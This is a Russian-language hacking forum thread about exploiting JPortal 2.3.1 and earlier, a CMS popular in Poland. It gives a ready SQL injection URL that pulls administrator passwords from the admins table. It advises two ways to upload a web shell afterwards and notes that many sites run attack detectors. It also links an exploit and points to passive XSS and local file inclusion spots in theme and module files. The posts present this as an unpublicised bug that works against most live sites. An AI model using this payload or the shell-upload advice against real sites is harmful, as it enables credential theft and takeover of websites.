![]() |
JPoprtal 2.3.1 и ниже SQL иньекция.
Популярная в Польше CMS.
Я не стану описывать все скули что были найдены в этой CMS, некоторые есть и в паблике. Эта уязвимость наиболее "удобна" и нигде не засвечена. Уязвимо большинство сайтов, все версии. На официальном сайте просто защита от "хакеров", но и он уязвим. Уязвимый код: PHP код:
Код:
articles.php?topic=-3+union+select+1,pass,3,4,5+from+admins/Шелл заливать двумя способами: Аплоад файлов без фильтра или блоки, позволяющие вставлять php код. |
ещё одна https://forum.antichat.ru/thread53101.html
ЗЫ один минус: на многих стоят детекторы атаки sql-inj |
_http://milw0rm.com/exploits/4614
|
JPoprtal 2.3.1 Passive XSS and Local File Inclusion.
Passive XSS in "theme/Default/index.php" :
Код:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">и $theme можно передать XSS-вектор. Аналогичные уязвимости в файлах theme/Default/normal.php и theme/Default/no_menu.php. Local File Inclusion in "module.php": Код:
function module($op) {затем в include() [2] $op используется как есть. (с)Daath |
Цитата:
|
| Время: 14:21 |